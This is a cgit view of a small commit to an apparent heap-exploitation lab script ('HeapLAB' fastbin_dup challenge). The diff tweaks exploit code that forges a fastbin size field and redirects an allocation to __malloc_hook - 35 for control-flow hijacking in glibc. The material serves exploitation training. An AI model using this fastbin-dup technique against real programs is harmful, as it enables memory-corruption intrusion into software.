summaryrefslogtreecommitdiff
path: root/HeapLAB/challenge-fastbin_dup/bruh.py
diff options
context:
space:
mode:
Diffstat (limited to 'HeapLAB/challenge-fastbin_dup/bruh.py')
-rwxr-xr-xHeapLAB/challenge-fastbin_dup/bruh.py7
1 files changed, 4 insertions, 3 deletions
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
index 191cbea..56b0c71 100755
--- a/HeapLAB/challenge-fastbin_dup/bruh.py
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -55,7 +55,7 @@ free(chunk1)
#malloc(24, p64(libc.sym.main_arena + 96))
#this sets up a fake size field in the fastbins
-malloc(24, p64(0x81))
+malloc(24, p64(0x80))
malloc(24, 'asdf')
malloc(24, 'asdf')
@@ -74,9 +74,10 @@ malloc(119, 'sdfg')
#8 * 9
-malloc(119, p64(0)*9 + p64(libc.sym.__free_hook - 16))
+payload_loc = libc.sym.__malloc_hook - 35
+malloc(119, p64(0)*9 + p64(payload_loc))
-print(hex(fake_chunk_loc))
+print("top chunk addr: {}".format(hex(payload_loc)))
# =============================================================================
generated by cgit v1.2.3 (git 2.39.1) at 2024-09-21 07:45:01 +0000